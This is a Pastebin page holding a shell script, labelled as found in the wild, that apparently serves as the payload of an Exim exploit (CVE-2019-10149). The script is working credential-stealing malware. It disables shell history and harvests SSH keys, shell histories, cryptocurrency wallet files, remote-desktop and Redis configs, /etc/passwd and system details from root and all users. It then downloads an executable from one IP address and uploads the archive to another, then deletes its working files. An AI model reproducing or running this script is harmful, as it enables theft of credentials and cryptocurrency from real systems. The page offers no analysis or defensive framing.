SHARE
TWEET

Untitled

a guest Jun 16th, 2019 193 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/sh
  2.  
  3. # found in the wild
  4. # exim exploit 2019-10149
  5.  
  6. export PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin:/usr/local/sbin
  7. export LC_ALL=C
  8. export HISTFILE=/dev/null
  9. export HISTSIZE=0
  10.  
  11. HOME=/root
  12. unset DISPLAY
  13. export UPLOAD_URL=https://85.25.84.99/up.php
  14.  
  15. NOLS=0
  16. NOETC=0
  17. NODUP=1
  18. V=2
  19. UF=temp3754r97y$V
  20.  
  21. if [ $NODUP -eq 1 ]; then
  22.     test -f /var/tmp/$UF -o -f /tmp/$UF -o -f /dev/shm/$UF && exit 100
  23. fi
  24. BASE=''
  25. touch /var/tmp/$UF && BASE=/var/tmp
  26. test -z "$BASE" && touch /tmp/$UF && BASE=/tmp
  27. test -z "$BASE" && touch /dev/shm/$UF && BASE=/dev/shm
  28. test -z "$BASE" && exit 90
  29. cd $BASE && mkdir r && cd r
  30. export PATH=$BASE:$PATH
  31.  
  32. snd () { sh -c "UPLOAD_FILE=\"$1\" UPLOAD_NAME=\"$(hostname).tbz2\" UPLOAD_URL=$UPLOAD_URL atd &"; }
  33.  
  34. # ok, real work starts here
  35. main_dir=$BASE/r
  36. mkdir $main_dir/root/
  37.  
  38. COPY_STUFF=".ssh/ .bashrc .zshrc .*history .histfile .profile .dbshell"
  39. cd $HOME && cp -a $COPY_STUFF $main_dir/root/ 2>/dev/null
  40.  
  41.  
  42. cd $HOME && tar cf $main_dir/root/root.tar \
  43.  .*coin/w*dat .*Coin/w*dat .dash*/w*dat .dash*/*.conf .*coin/*.conf .*Coin/*.conf *address.txt \
  44.  *coin/w*dat *Coin/w*dat .vnc* .redis* .rdesk* .remmina \
  45.  /home/*/.*coin/w*dat /home/*/.dash*/w*dat /home/*/.dash*/*conf /home/*/.*Coin/w*dat /home/*/.*coin/*.conf /home/*/.*Coin/*.conf \
  46.  /home/*/.ssh /home/*/.remmina /home/*/.vnc* /home/*/.redis* /home/*/.rdesk* /home/*/.remmina \
  47.  /home/*/.bash* /home/*/.zsh* /home/*/.*hist* /home/*/.profile /home/*/.dbshell 2>/dev/null
  48. cd $main_dir/root/
  49.  
  50. ssh -V > ssh.version 2>/dev/null
  51.  
  52. if [ $NOLS -eq 0 ]; then
  53.     ls -la /home/ > homes 2>/dev/null
  54.     ls -la /home/*/ >> homes 2>/dev/null
  55.     la -laR /root > rootls 2>/dev/null
  56. fi
  57.  
  58. mkdir $main_dir/root/sysinfo 2>/dev/null
  59. cd    $main_dir/root/sysinfo 2>/dev/null
  60.  
  61. # EXIM
  62. tail -n 100 /etc/*release /etc/version > system.version  2>/dev/null
  63. ip addr > ip  2>/dev/null
  64. iptables-save  > iptables  2>/dev/null
  65. ip6tables-save > ip6tables 2>/dev/null
  66. # /EXIM end exim
  67.  
  68. hostname > hostname
  69. uname -a > uname
  70. echo `date -u` '('`$(which date)`')' > date
  71. uptime > uptime
  72. w > w
  73. id > id
  74.  
  75. ps auxwwwwwTH > ps
  76. ps auxwwwwwf  > ps-forest
  77. ps auxwwwwwfe > ps-env
  78.  
  79. cat /proc/meminfo > meminfo 2>/dev/null
  80. cat /proc/cpuinfo > cpuinfo 2>/dev/null
  81. ifconfig -a > ifconfig 2>/dev/null
  82. df > df 2>/dev/null
  83. dmesg > dmesg 2>/dev/null
  84. mount > mount 2>/dev/null
  85. env > env 2>/dev/null
  86.  
  87. lspci -k > lspci 2>/dev/null
  88. lsusb > lsusb 2>/dev/null
  89.  
  90. netstat -antpuxwenW > netstat 2>/dev/null
  91. route -en > route 2>/dev/null
  92.  
  93. # other kernel info
  94. cat /proc/modules > lsmod 2>/dev/null
  95. cp /proc/version /proc/cmdline /proc/filesystems . 2>/dev/null
  96. lscpu > lscpu 2>/dev/null
  97.  
  98. # copy stuff from /etc?
  99. if [ $NOETC -eq 0 ]; then
  100.     mkdir $main_dir/root/sysinfo/etc
  101.     cd    $main_dir/root/sysinfo/etc
  102.     cp -pRL /etc/*release /etc/cron* /etc/*version /etc/issue* /etc/hosts* /etc/motd /etc/passwd /etc/apache2 /etc/httpd /etc/nginx /etc/resolv* /etc/wpa* . 2>/dev/null
  103.     cd -
  104. fi
  105.  
  106. cd $main_dir/root
  107.  
  108. # list some dirs
  109. if [ $NOLS -eq 0 ]; then
  110.     ls -laR /boot > ls-boot 2>&1
  111.     ls -laR /etc  > ls-etc  2>&1
  112. fi
  113.  
  114. # compress n clean up
  115. cd $main_dir
  116. tar -cj --exclude 'root/sysinfo/etc/httpd/modules*' --exclude 'root/sysinfo/etc/httpd/lib*' --exclude 'root/sysinfo/etc/httpd/man*' -f $BASE/rf root
  117.  
  118. # drop source files
  119. rm -rf $main_dir &
  120.  
  121. # ready to send!
  122. cd $BASE
  123. wget -q http://173.212.214.137/se -O atd || wget -q http://173.212.214.137/icantgetit -O /dev/null
  124. test `stat -c %s atd` -eq 610932 && chmod +x atd && snd rf
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top